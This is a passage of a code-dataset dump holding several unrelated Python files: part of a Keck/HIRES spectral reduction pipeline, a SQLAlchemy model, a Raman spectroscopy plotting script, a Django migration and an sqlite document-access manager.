(not elegant!)\n item = logtable[-1]\n\n # print log item with colors\n string = pinfo.get_format(has_esc=False).format(item)\n print(print_wrapper(string, item))\n\n prev_frameid = frameid\n\n print(pinfo.get_separator())\n\n # sort by obsdate\n #logtable.sort('obsdate')\n\n # determine filename of logtable.\n # use the obsdate of the LAST frame.\n obsdate = logtable[-1]['obsdate'].iso[0:10]\n outname = '{}.obslog'.format(obsdate)\n if os.path.exists(outname):\n i = 0\n while(True):\n i += 1\n outname = '{}.{}.obslog'.format(obsdate, i)\n if not os.path.exists(outname):\n outfilename = outname\n break\n else:\n outfilename = outname\n\n # save the logtable\n\n # loginfo is not pinfo because not all columns need to be printed in the\n # screen, but all columns should be written in logfile.\n loginfo = FormattedInfo(all_columns)\n outfile = open(outfilename, 'w')\n outfile.write(loginfo.get_title()+os.linesep)\n outfile.write(loginfo.get_dtype()+os.linesep)\n outfile.write(loginfo.get_separator()+os.linesep)\n for row in logtable:\n outfile.write(loginfo.get_format(has_esc=False).format(row)+os.linesep)\n outfile.close()\n\ndef get_badpixel_mask(binning, ccd=0):\n \"\"\"Get bad pixel mask for HIRES CCDs.\n\n Args:\n binning (tuple): CCD binning (*bin_x*, *bin_y*).\n ccd (int): CCD number.\n\n Returns:\n mask (:class:`numpy.ndarray`): Mask Image.\n\n \"\"\"\n # for only 1 CCD\n if ccd == 0:\n if binning == (1, 1):\n # all Flase\n mask = np.zeros((2048, 2048), dtype=np.bool)\n mask[:, 1127] = True\n mask[:375, 1128] = True\n mask[:, 2007] = True\n mask[:, 2008] = True\n # for 3 CCDs\n elif ccd == 1:\n # for Blue CCD\n if binning == (2, 1):\n # all False\n mask = np.zeros((4096, 1024), dtype=np.bool)\n mask[3878:, 4] = True\n mask[3008:, 219] = True\n mask[4005:, 337] = True\n mask[1466:, 411] = True\n mask[1466:, 412] = True\n mask[3486:, 969] = True\n mask[:, 994:] = True\n elif ccd == 2:\n # for Green CCD\n if binning == (2, 1):\n # all False\n mask = np.zeros((4096, 1024), dtype=np.bool)\n mask[3726:, 323] = True\n mask[3726:, 324] = True\n elif ccd == 3:\n # for Red CCD\n if binning == (2, 1):\n # all False\n mask = np.zeros((4096, 1024), dtype=np.bool)\n mask[1489:2196, 449] = True\n mask[:, 0:45] = True\n return np.int16(mask)\n\nclass TraceFigure(TraceFigureCommon):\n \"\"\"Figure to plot the order tracing.\n \"\"\"\n def __init__(self):\n TraceFigureCommon.__init__(self, figsize=(20,10), dpi=150)\n self.ax1 = self.add_axes([0.05,0.07,0.50,0.86])\n self.ax2 = self.add_axes([0.59,0.55,0.36,0.34])\n self.ax3 = self.add_axes([0.59,0.13,0.36,0.34])\n self.ax4 = self.ax3.twinx()\n\ndef mosaic_3_images(data_lst, mask_lst):\n \"\"\"Mosaic three images.\n\n Args:\n data_lst (list): List of image data.\n mask_lst (list): List of mask data.\n\n Returns:\n tuple:\n \"\"\"\n data1, data2, data3 = data_lst\n mask1, mask2, mask3 = mask_lst\n gap_rg, gap_gb = 26, 20\n\n # mosaic image: allimage and allmask\n h3, w3 = data3.shape\n h2, w2 = data2.shape\n h1, w1 = data1.shape\n\n hh = h3 + gap_rg + h2 + gap_gb + h1\n allimage = np.ones((hh, w3), dtype=data1.dtype)\n allmask = np.zeros((hh, w3), dtype=np.int16)\n r1, g1, b1 = 0, h3+gap_rg, h3+gap_rg+h2+gap_gb\n r2, g2, b2 = r1+h3, g1+h2, b1+h1\n allimage[r1:r2] = data3\n allimage[g1:g2] = data2\n allimage[b1:b2] = data1\n allmask[r1:r2] = mask3\n allmask[g1:g2] = mask2\n allmask[b1:b2] = mask1\n # fill gap with gap pixels\n allmask[r2:g1] = 1\n allmask[g2:b1] = 1\n\n return allimage, allmask\n\ndef reduce():\n \"\"\"2D to 1D pipeline for Keck/HIRES.\n 
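Steps (summary): read the observing log and config file, combine the bias frames for each CCD, combine and mosaic the flats, trace the orders, and extract the flat-field spectrum.\n    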
\"\"\"\n\n # find obs log\n logname_lst = [fname for fname in os.listdir(os.curdir)\n if fname[-7:]=='.obslog']\n if len(logname_lst)==0:\n print('No observation log found')\n exit()\n elif len(logname_lst)>1:\n print('Multiple observation log found:')\n for logname in sorted(logname_lst):\n print(' '+logname)\n else:\n pass\n\n # read obs log\n logtable = read_obslog(logname_lst[0])\n\n # load config files\n config = configparser.ConfigParser(\n inline_comment_prefixes = (';','#'),\n interpolation = configparser.ExtendedInterpolation(),\n )\n # find local config file\n for fname in os.listdir(os.curdir):\n if fname[-4:]=='.cfg':\n config.read(fname)\n print('Load Congfile File: {}'.format(fname))\n break\n\n # extract keywords from config file\n section = config['data']\n rawpath = section.get('rawpath')\n statime_key = section.get('statime_key')\n exptime_key = section.get('exptime_key')\n section = config['reduce']\n midpath = section.get('midpath')\n odspath = section.get('odspath')\n figpath = section.get('figpath')\n mode = section.get('mode')\n fig_format = section.get('fig_format')\n oned_suffix = section.get('oned_suffix')\n\n # create folders if not exist\n if not os.path.exists(figpath): os.mkdir(figpath)\n if not os.path.exists(odspath): os.mkdir(odspath)\n if not os.path.exists(midpath): os.mkdir(midpath)\n\n nccd = 3\n\n ########################## load file selection #############################\n sel_lst = {}\n filesel_filename = 'file_selection.txt'\n if os.path.exists(filesel_filename):\n sel_file = open(filesel_filename)\n for row in sel_file:\n row = row.strip()\n if len(row)==0 or row[0] in '#':\n continue\n g = row.split(':')\n key, value = g[0].strip(), g[1].strip()\n if len(value)>0:\n sel_lst[key] = value\n sel_file.close()\n\n ################################ parse bias ################################\n bias_file = config['reduce.bias'].get('bias_file')\n\n if mode=='debug' and os.path.exists(bias_file):\n has_bias = True\n # load bias data from existing file\n hdu_lst = fits.open(bias_file)\n # pack bias image\n bias = [hdu_lst[iccd+1].data for iccd in range(nccd)]\n hdu_lst.close()\n message = 'Load bias data from file: {}'.format(bias_file)\n logger.info(message)\n print(message)\n else:\n # read each individual CCD\n bias_data_lst = [[] for iccd in range(nccd)]\n\n # initialize printing infomation\n pinfo1 = FormattedInfo(all_columns, ['frameid', 'fileid', 'object',\n 'exptime', 'nsat_1', 'q95_1', 'nsat_2', 'q95_2',\n 'nsat_3', 'q95_3'])\n\n for logitem in logtable:\n if logitem['object'].strip().lower()=='bias':\n fname = logitem['fileid']+'.fits'\n filename = os.path.join(rawpath, fname)\n hdu_lst = fits.open(filename)\n data_lst, mask_lst = parse_3ccd_images(hdu_lst)\n hdu_lst.close()\n\n # print info\n if len(bias_data_lst[0]) == 0:\n print('* Combine Bias Images: {}'.format(bias_file))\n print(' '*2 + pinfo1.get_separator())\n print(' '*2 + pinfo1.get_title())\n print(' '*2 + pinfo1.get_separator())\n string = pinfo1.get_format().format(logitem)\n print(' '*2 + print_wrapper(string, logitem))\n\n for iccd in range(nccd):\n bias_data_lst[iccd].append(data_lst[iccd])\n\n n_bias = len(bias_data_lst[0]) # get number of bias images\n has_bias = n_bias > 0\n\n if has_bias:\n # there is bias frames\n print(' '*2 + pinfo1.get_separator())\n\n bias = []\n # the final HDU list\n bias_hdu_lst = fits.HDUList([fits.PrimaryHDU()])\n\n # scan for each ccd\n for iccd in range(nccd):\n ### 3 CCDs loop begins here ###\n bias_data_lst[iccd] = 
np.array(bias_data_lst[iccd])\n\n section = config['reduce.bias']\n sub_bias = combine_images(bias_data_lst[iccd],\n mode = 'mean',\n upper_clip = section.getfloat('cosmic_clip'),\n maxiter = section.getint('maxiter'),\n mask = (None, 'max')[n_bias>=3],\n )\n\n message = '\\033[{2}mCombined bias for CCD {0}: Mean = {1:6.2f}\\033[0m'.format(\n iccd+1, sub_bias.mean(), (34, 32, 31)[iccd])\n\n print(message)\n\n head = fits.Header()\n head['HIERARCH GAMSE BIAS NFILE'] = n_bias\n\n ############## bias smooth ##################\n section = config['reduce.bias']\n if section.getboolean('smooth'):\n # bias needs to be smoothed\n smooth_method = section.get('smooth_method')\n\n h, w = sub_bias.shape\n if smooth_method in ['gauss', 'gaussian']:\n # perform 2D gaussian smoothing\n smooth_sigma = section.getint('smooth_sigma')\n smooth_mode = section.get('smooth_mode')\n \n bias_smooth = gaussian_filter(sub_bias,\n sigma=smooth_sigma, mode=smooth_mode)\n\n # write information to FITS header\n head['HIERARCH GAMSE BIAS SMOOTH'] = True\n head['HIERARCH GAMSE BIAS SMOOTH METHOD'] = 'GAUSSIAN'\n head['HIERARCH GAMSE BIAS SMOOTH SIGMA'] = smooth_sigma\n head['HIERARCH GAMSE BIAS SMOOTH MODE'] = smooth_mode\n else:\n print('Unknown smooth method: ', smooth_method)\n pass\n\n sub_bias = bias_smooth\n else:\n # bias not smoothed\n head['HIERARCH GAMSE BIAS SMOOTH'] = False\n\n bias.append(sub_bias)\n bias_hdu_lst.append(fits.ImageHDU(data=sub_bias, header=head))\n ### 3 CCDs loop ends here ##\n\n # write bias into file\n bias_hdu_lst.writeto(bias_file, overwrite=True)\n\n else:\n # no bias found\n pass\n\n ########################## find flat groups #########################\n flat_file = config['reduce.flat'].get('flat_file')\n\n flatdata_lst = []\n # a list of 3 combined flat images. [Image1, Image2, Image3]\n # bias has been corrected already. 
but not rotated yet.\n flatmask_lst = []\n # a list of 3 flat masks\n\n if mode=='debug' and os.path.exists(flat_file):\n # read flat data from existing file\n hdu_lst = fits.open(flat_file)\n for iccd in range(nccd):\n flatdata_lst.append(hdu_lst[iccd*2+1].data)\n flatmask_lst.append(hdu_lst[iccd*2+2].data)\n flatdata = hdu_lst[nccd*2+1].data.T\n flatmask = hdu_lst[nccd*2+2].data.T\n hdu_lst.close()\n message = 'Loaded flat data from file: {}'.format(flat_file)\n print(message)\n\n # alias of flat data and mask\n flatdata1 = flatdata_lst[0].T\n flatmask1 = flatmask_lst[0].T\n flatdata2 = flatdata_lst[1].T\n flatmask2 = flatmask_lst[1].T\n flatdata3 = flatdata_lst[2].T\n flatmask3 = flatmask_lst[2].T\n\n else:\n print('*'*10 + 'Parsing Flat Fieldings' + '*'*10)\n # print the flat list\n pinfo_flat = FormattedInfo(all_columns, ['frameid', 'fileid', 'object',\n 'exptime', 'nsat_1', 'q95_1', 'nsat_2', 'q95_2', 'nsat_3', 'q95_3'])\n print(' '*2 + pinfo_flat.get_separator())\n print(' '*2 + pinfo_flat.get_title())\n print(' '*2 + pinfo_flat.get_separator())\n for logitem in logtable:\n if len(logitem['object'])>=8 and logitem['object'][0:8]=='flatlamp':\n string = pinfo_flat.get_format().format(logitem)\n print(' '*2 + print_wrapper(string, logitem))\n print(' '*2 + pinfo_flat.get_separator())\n\n\n flat_group_lst = {}\n for iccd in range(nccd):\n\n key = 'flat CCD%d'%(iccd+1)\n sel_string = sel_lst[key] if key in sel_lst else ''\n prompt = '\\033[{1}mSelect flats for CCD {0} [{2}]: \\033[0m'.format(\n iccd+1, (34, 32, 31)[iccd], sel_string)\n\n # read selected files from terminal\n while(True):\n input_string = input(prompt)\n if len(input_string.strip())==0:\n # nothing input\n if key in sel_lst:\n # nothing input but already in selection list\n flat_group_lst[iccd] = parse_num_seq(sel_lst[key])\n break\n else:\n # repeat prompt\n continue\n else:\n # something input\n frameid_lst = parse_num_seq(input_string)\n # pack\n flat_group_lst[iccd] = frameid_lst\n # put input string into selection list\n sel_lst[key] = input_string.strip()\n break\n\n # now combine flat images\n\n flat_hdu_lst = [fits.PrimaryHDU()]\n # flat_hdu_lst is the final HDU list to be saved as fits\n\n for iccd in range(nccd):\n frameid_lst = flat_group_lst[iccd]\n\n # now combine flats for this CCD\n flat_data_lst = []\n # flat_data_lst is a list of flat images to be combined.\n # flat_data_lst = [Image1, Image2, Image3, Image4, ... 
...]\n\n #scan the logtable\n # log loop inside the CCD loop because flats for different CCDs are\n # in different files\n for logitem in logtable:\n if logitem['frameid'] in frameid_lst:\n filename = os.path.join(rawpath, logitem['fileid']+'.fits')\n hdu_lst = fits.open(filename)\n data_lst, mask_lst = parse_3ccd_images(hdu_lst)\n hdu_lst.close()\n\n # correct bias and pack into flat_data_lst\n if has_bias:\n flat_data_lst.append(data_lst[iccd]-bias[iccd])\n else:\n flat_data_lst.append(data_lst[iccd])\n\n # initialize flat mask\n if len(flat_data_lst) == 1:\n flatmask = mask_lst[iccd]\n flatmask = flatmask | mask_lst[iccd]\n\n n_flat = len(flat_data_lst)\n\n if n_flat == 0:\n continue\n elif n_flat == 1:\n flatdata = flat_data_lst[0]\n else:\n flat_data_lst = np.array(flat_data_lst)\n flatdata = combine_images(flat_data_lst,\n mode = 'mean',\n upper_clip = 10,\n maxiter = 5,\n mask = (None, 'max')[n_flat>=3],\n )\n #print('\\033[{1}mCombined flat data for CCD {0}: \\033[0m'.format(\n # iccd+1, (34, 32, 31)[iccd]))\n flatdata_lst.append(flatdata)\n flatmask_lst.append(flatmask)\n\n # pack the combined flat data into flat_hdu_lst\n head = fits.Header()\n head['HIERARCH GAMSE FLAT CCD{} NFILE'.format(iccd+1)] = n_flat\n flat_hdu_lst.append(fits.ImageHDU(flatdata, head))\n flat_hdu_lst.append(fits.ImageHDU(flatmask))\n # CCD loop ends here\n\n # alias of flat data and mask\n flatdata1 = flatdata_lst[0].T\n flatmask1 = flatmask_lst[0].T\n flatdata2 = flatdata_lst[1].T\n flatmask2 = flatmask_lst[1].T\n flatdata3 = flatdata_lst[2].T\n flatmask3 = flatmask_lst[2].T\n\n # mosaic flat data\n flatdata, flatmask = mosaic_3_images(\n data_lst = (flatdata1, flatdata2, flatdata3),\n mask_lst = (flatmask1, flatmask2, flatmask3),\n )\n\n flat_hdu_lst.append(fits.ImageHDU(flatdata.T))\n flat_hdu_lst.append(fits.ImageHDU(flatmask.T))\n # write flat data to file\n flat_hdu_lst = fits.HDUList(flat_hdu_lst)\n flat_hdu_lst.writeto(flat_file, overwrite=True)\n print('Flat data writed to {}'.format(flat_file))\n\n ######################### find & trace orders ##########################\n\n # simple debackground for all 3 CCDs\n xnodes = np.arange(0, flatdata1.shape[1], 200)\n flatdbkg1 = simple_debackground(flatdata1, flatmask1, xnodes, smooth=20,\n deg=3, maxiter=10)\n\n xnodes = np.arange(0, flatdata2.shape[1], 200)\n flatdbkg2 = simple_debackground(flatdata2, flatmask2, xnodes, smooth=20,\n deg=3, maxiter=10)\n\n xnodes = np.arange(0, flatdata3.shape[1], 200)\n flatdbkg3 = simple_debackground(flatdata3, flatmask3, xnodes, smooth=20,\n deg=3, maxiter=10)\n\n allimage, allmask = mosaic_3_images(\n data_lst = (flatdbkg1, flatdbkg2, flatdbkg3),\n mask_lst = (flatmask1, flatmask2, flatmask3),\n )\n\n tracefig = TraceFigure()\n\n section = config['reduce.trace']\n aperset = find_apertures(allimage, allmask,\n scan_step = section.getint('scan_step'),\n minimum = section.getfloat('minimum'),\n separation = section.get('separation'),\n align_deg = section.getint('align_deg'),\n filling = section.getfloat('filling'),\n degree = section.getint('degree'),\n display = section.getboolean('display'),\n fig = tracefig,\n )\n # decorate trace fig and save to file\n tracefig.adjust_positions()\n tracefig.suptitle('Trace for all 3 CCDs', fontsize=15)\n figfile = os.path.join(figpath, 'trace.png')\n tracefig.savefig(figfile)\n\n trcfile = os.path.join(midpath, 'trace.trc')\n aperset.save_txt(trcfile)\n\n regfile = os.path.join(midpath, 'trace.reg')\n aperset.save_reg(regfile, transpose=True)\n\n # save mosaiced flat image\n 
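# note (added): the mosaic and mask are written transposed (.T), mirroring the\n    # transposed aliases created in the flat-field section above\n    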
trace_hdu_lst = fits.HDUList(\n [fits.PrimaryHDU(allimage.T),\n fits.ImageHDU(allmask.T),\n ])\n trace_hdu_lst.writeto(config['reduce.trace'].get('file'), overwrite=True)\n\n ######################### Extract flat spectrum ############################\n\n spectra1d = extract_aperset(flatdata, flatmask,\n apertureset = aperset,\n lower_limit = 6,\n upper_limit = 6,\n )\n\n flatmap = get_slit_flat(flatdata, flatmask,\n apertureset = aperset,\n spectra1d = spectra1d,\n lower_limit = 6,\n upper_limit = 6,\n deg = 7,\n q_threshold = 20**2,\n figfile = 'spec_%02d.png',\n )\n fits.writeto('flat_resp.fits', flatmap, overwrite=True)\n","sub_path":"gamse/pipelines/hires.py","file_name":"hires.py","file_ext":"py","file_size_in_byte":32152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"204127239","text":"from v1.apps import db\n\nfrom ..statistics.models import Statistics\n\nclass Player(db.Model):\n __tablename__ = 'player'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(32))\n active = db.Column(db.Boolean, default=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n user = db.relationship('User', backref=db.backref('players', lazy='dynamic'))\n #statistics = db.relationship(\"Statistics\", uselist=False, backref=\"player_statistics\")\n","sub_path":"server/v1/apps/game/players/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"250887602","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass Raman:\n def __init__(self):\n self.fitPixels = True\n self.removeFluo = True\n\n self.oilFiles = [\"data/{}.TXT\".format(oil) for oil in [\"mais\", \"arachide\", \"tournesol\", \"canola\", \"olive40m\"]]\n self.oilNames = [\"Maïs\", \"Arachide\", \"Tournesol\", \"Canola\", \"Olive\"]\n self.integrationTimes = [100, 100, 100, 100, 4500]\n\n self.solFiles = [\"data/{}.TXT\".format(solution) for solution in [\"ethanol\", \"isopropanol\", \"methanol\", \"glycerol\", \"sucrose\"]]\n self.solNames = [\"Éthanol\", \"Isopropanol\", \"Méthanol\", \"Glycérol\", \"Sucrose\"]\n\n self.readNoiseValue = 61634\n self.thermalCoef = 8.97\n self.photonsPerBit = 4.35\n\n self.calibCoefs = []\n self.pixels = []\n self.waveNumbers = []\n self.intensities = []\n\n self.fileName = \"\"\n\n def graphOils(self):\n fig, axes = plt.subplots(len(self.oilFiles), sharex=True, sharey=False)\n\n self.setCalibration()\n\n for i, file in enumerate(self.oilFiles):\n pixel, intensity = self.getData(file)\n intensity -= self.readNoiseValue\n intensity -= self.thermalCoef * self.integrationTimes[i]\n intensity *= self.photonsPerBit\n intensity /= self.integrationTimes[i]\n\n waveNumber = self.translate(pixel)\n\n waveNumber, intensity = self.cut(waveNumber, intensity)\n\n fit = self.curveFit(waveNumber, intensity, degree=5, sections=1)\n\n raman = intensity - fit\n\n axes[i].plot(waveNumber, intensity)\n axes[i].plot(waveNumber, raman, label=self.oilNames[i])\n axes[i].legend(handlelength=0, fontsize=12)\n axes[i].set_ylim(min(raman), 3200)\n axes[i].tick_params(labelsize=12)\n\n print(\"STD \", i, np.std(raman[200:220]))\n\n if i == 2:\n axes[i].set_ylabel(\"Intensité [p/s]\", fontsize=13)\n\n if i == 6: # i == 4 : Last resort ploting\n plt.show()\n\n ax1 = plt.subplot2grid((5, 2), (0, 0), rowspan=3, colspan=2)\n ax2 = plt.subplot2grid((5, 2), (3, 0))\n ax3 = plt.subplot2grid((5, 2), (3, 1))\n ax4 = 
plt.subplot2grid((5, 2), (4, 0), colspan=2)\n            ax1.plot(waveNumber, intensity, label=\"Signal total\")\n            ax1.plot(waveNumber, fit, label=\"Curve-fit\")\n            ax2.plot(waveNumber, intensity, label=\"Signal total\")\n            ax2.plot(waveNumber, fit, label=\"Curve-fit\")\n            ax3.plot(waveNumber, intensity, label=\"Signal total\")\n            ax3.plot(waveNumber, fit, label=\"Curve-fit\")\n            ax4.plot(waveNumber, raman, label=\"Signal Raman\")\n\n            ax2.set_ylabel(\"Intensité [p/s]\", fontsize=13)\n            ax4.set_xlabel(\"Nombre d'onde [cm$^{-1}$]\", fontsize=13)\n            ax1.set_xlim(1200, 1850)\n            ax2.set_xlim(1200, 1450)\n            ax3.set_xlim(1500, 1850)\n            ax4.set_xlim(1200, 1850)\n            ax1.legend()\n            ax3.legend()\n            ax4.legend()\n            ax1.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n            ax2.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n            ax3.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))\n            plt.show()\n\n        plt.xlabel(\"Nombre d'onde [cm$^{-1}$]\", fontsize=13)\n        plt.xlim(1200, 1850)\n        fig.subplots_adjust(hspace=0, top=0.965, bottom=0.11, left=0.14, right=0.94, wspace=0.2)\n\n        plt.show()\n\n    def graphSols(self):\n        fig, axes = plt.subplots(len(self.solFiles), sharex=True, sharey=False)\n\n        self.setCalibration()\n\n        for i, file in enumerate(self.solFiles):\n            pixel, intensity = self.getData(file)\n            intensity -= self.readNoiseValue\n            intensity -= self.thermalCoef * 100\n\n            waveNumber = self.translate(pixel)\n\n            waveNumber, intensity = self.cut(waveNumber, intensity, low=250, high=1600)\n\n            fit = 0\n            if i in (3, 4):  # fit a baseline only for glycerol and sucrose\n                fit = self.curveFit(waveNumber, intensity, degree=2, sections=1)\n\n            raman = intensity - fit\n            raman /= 100\n            raman *= self.photonsPerBit\n            axes[i].plot(waveNumber, raman, label=self.solNames[i])\n            axes[i].legend(handlelength=0, fontsize=12)\n            axes[i].set_ylim(min(raman), 4000)\n            axes[i].tick_params(labelsize=12)\n\n            if i == 2:\n                axes[i].set_ylabel(\"Intensité [p/s]\", fontsize=13)\n\n        plt.xlabel(\"Nombre d'onde [cm$^{-1}$]\", fontsize=13)\n        plt.xlim(250, 1600)\n        fig.subplots_adjust(hspace=0, top=0.965, bottom=0.11, left=0.14, right=0.94, wspace=0.2)\n\n        plt.show()\n\n    def getFile(self):\n        self.oilFiles = [\"data/{}.TXT\".format(oil) for oil in [\"mais\", \"arachide\", \"tournesol\", \"canola\", \"olive40m\"]]\n\n        self.fileName = \"data/{}\".format([\"mercury_27nov.txt\", \"ethanol.TXT\", \"olive40m.TXT\", \"canola.TXT\", \"mais.TXT\",\n                                           \"arachide.TXT\", \"tournesol.TXT\", \"lampeMercure1.TXT\"][6])\n\n    @staticmethod\n    def getData(fileName):\n        pixels = []\n        intensities = []\n        with open(fileName, \"r\") as file:\n            for line in file.readlines()[:-1]:\n                data = line.split(\",\")[1:]\n                pixels.append(float(data[0]))\n                intensities.append(float(data[1]))\n        return np.array(pixels), np.array(intensities)\n\n    def setCalibration(self):\n        mercure1 = [[588, 842.2, 1089.5, 1104.3], [671, 690, 708, 709]]\n        mercure2 = [[587.5, 841, 1089, 1103.5], [671, 690, 708, 709]]\n        # ethanol = [[571.2, 670.3, 697, 809.2, 927.2], self.wToLambda([879, 1050, 1085, 1279, 1450])]\n\n        pixels = mercure1[0] + mercure2[0]\n        wavelengths = mercure1[1] + mercure2[1]\n\n        self.calibCoefs = np.polyfit(pixels, wavelengths, 1)\n\n    def translate(self, pixels):\n        [a, b] = self.calibCoefs\n        wavelengths = np.array(pixels)*a + b\n        waveNumbers = 1/632.8 - 1/wavelengths\n        return waveNumbers * 10**7\n\n    @staticmethod\n    def wToLambda(waveNumbers):\n        return [np.round(((1/632.8 - w*10**(-7))**(-1)), 2) for w in waveNumbers]\n\n    def cut(self, waveNumbers, intensities, low=1200, high=1850):\n        start = np.where(waveNumbers > low)[0][0]\n        end = np.where(waveNumbers > 
high)[0][0]\n\n return waveNumbers[start: end], intensities[start: end]\n\n @staticmethod\n def curveFit(waveNumbers, intensities, degree, sections):\n fit = []\n for waveNumbers, intensities in zip(np.split(waveNumbers, sections), np.split(intensities, sections)):\n\n coefs = np.polyfit(waveNumbers, intensities, degree)\n fit.extend([np.sum([(waveNumber**i)*c for i, c in enumerate(reversed(coefs))]) for waveNumber in waveNumbers])\n return fit\n\n @staticmethod\n def save(waveNumbers, intensities):\n col1 = np.array(waveNumbers)[np.newaxis].T\n col2 = np.array(intensities)[np.newaxis].T\n data = np.hstack((col1, col2))\n\n np.savetxt(\"outputRaman.txt\", data, '%.15f')\n\n\nRaman().graphOils()\nRaman().graphSols()\n","sub_path":"20181120 - spectroscopieRaman/graphRaman.py","file_name":"graphRaman.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"74820302","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bom',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=31)),\n ('notes', models.CharField(max_length=255, null=True, blank=True)),\n ('active', models.BooleanField(default=True)),\n ('est_time', models.DurationField(null=True, blank=True)),\n ('wholesale', models.DecimalField(null=True, max_digits=6, decimal_places=2, blank=True)),\n ('est_labor', models.DecimalField(null=True, max_digits=6, decimal_places=2, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Employee',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('first_name', models.CharField(max_length=31)),\n ('last_name', models.CharField(max_length=31)),\n ('initials', models.CharField(unique=True, max_length=3)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Punch',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date_created', models.DateTimeField(auto_now_add=True)),\n ('check_in', models.DateTimeField(auto_now_add=True)),\n ('check_out', models.DateTimeField(null=True, blank=True)),\n ('notes', models.CharField(max_length=255, null=True, blank=True)),\n ('approved', models.BooleanField(default=False)),\n ('paid', models.BooleanField(default=False)),\n ('employee', models.ForeignKey(to='production.Employee')),\n ],\n ),\n migrations.CreateModel(\n name='Task',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=31)),\n ],\n ),\n migrations.CreateModel(\n name='WorkOrder',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('closed', models.BooleanField(default=False)),\n ('issue_date', models.DateField(auto_now_add=True)),\n ('close_date', models.DateField(null=True, blank=True)),\n ('close_by', models.ForeignKey(related_name='close_by', blank=True, to='production.Employee', null=True)),\n ('issue_by', models.ForeignKey(related_name='issue_by', to='production.Employee')),\n ],\n ),\n 
migrations.CreateModel(\n            name='WorkOrderBom',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('order', models.IntegerField(null=True, blank=True)),\n                ('actual', models.IntegerField(null=True, blank=True)),\n                ('actual_by', models.ForeignKey(related_name='actual_by', blank=True, to='production.Employee', null=True)),\n                ('bom', models.ForeignKey(to='production.Bom')),\n                ('order_by', models.ForeignKey(related_name='order_by', to='production.Employee')),\n                ('work_order', models.ForeignKey(to='production.WorkOrder')),\n            ],\n        ),\n        migrations.AddField(\n            model_name='punch',\n            name='task',\n            field=models.ForeignKey(to='production.Task'),\n        ),\n        migrations.AddField(\n            model_name='punch',\n            name='work_order',\n            field=models.ForeignKey(to='production.WorkOrder'),\n        ),\n    ]\n","sub_path":"production/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"566906961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nScript for working with the database:\nadd, delete, and change access rights for documents;\nadd and delete users.\n\"\"\"\nimport sqlite3\nimport datetime\n\nfrom Crypto.Hash import MD5\nfrom Crypto.PublicKey import RSA\n\n\nclass Database:\n    users = []\n    documents = []\n\n    def __init__(self):\n        self.con = sqlite3.connect('Petrel.db')\n        self.cur = self.con.cursor()\n        self.cur.execute('SELECT * FROM users')\n        for row in self.cur:\n            self.users.append(row[1])\n        self.cur.execute('SELECT * FROM files')\n        for row in self.cur:\n            self.documents.append(row[1])\n\n    def addDocument(self, filename, owner):\n        # count how many documents already have this name\n        self.cur.execute(\"SELECT filename FROM files \"\n                         \"WHERE filename = ?;\", [filename])\n        count = 0\n        for row in self.cur:\n            count += 1\n        # print(count)\n        # add the document only if no document with this name\n        # already exists in the system\n        if count == 0:\n            self.documents.append(filename)  # register the name only on success\n            self.cur.execute(\"INSERT INTO files \"\n                             \"(filename, owner, sign, date)\"\n                             \"VALUES (?,?,?,?)\",\n                             [filename, owner, \"-\", str(datetime.datetime.now())])\n            for user in self.users:\n                if user != owner:\n                    # every other user gets right \"n\" (no access)\n                    self.cur.execute(\"INSERT INTO hru \"\n                                     \"(filename, user, right)\"\n                                     \"VALUES (?,?,?);\",\n                                     [filename, user, \"n\"])\n                    self.con.commit()\n                else:\n                    # the owner gets right \"o\"\n                    self.cur.execute(\"INSERT INTO hru \"\n                                     \"(filename, user, right)\"\n                                     \"VALUES (?,?,?);\",\n                                     [filename, user, \"o\"])\n                    self.con.commit()\n            return (0, \"File \" + filename + \" added\")\n        else:\n            return (1, \"Document with name \" + filename +\n                    \" already exists in the system\")\n\n    # delete the file named filename in the currentUser session\n    def deleteDocument(self, filename, currentUser):\n        self.cur.execute(\"SELECT owner FROM files \"\n                         \"WHERE filename = ?;\",\n                         [filename])\n        fileOwner = \"\"\n        for row in self.cur:\n            fileOwner = row[0]\n        if fileOwner == currentUser:\n            self.cur.execute(\"DELETE FROM files WHERE filename = ?\",\n                             [filename])\n            self.cur.execute(\"DELETE FROM hru WHERE filename = ?\",\n                             [filename])\n            self.con.commit()\n            # TODO: add a step that physically deletes the file\n            return 0, \"File deleted\"\n        else:\n            return 1, \"You're not the owner, you can't delete this document\"\n\n    
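# (added note) rights stored in the hru table: \"o\" = owner, \"s\" = access\n    # granted, \"n\" = no access; these values are written by addDocument,\n    # addUser and changeRight below.\n    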
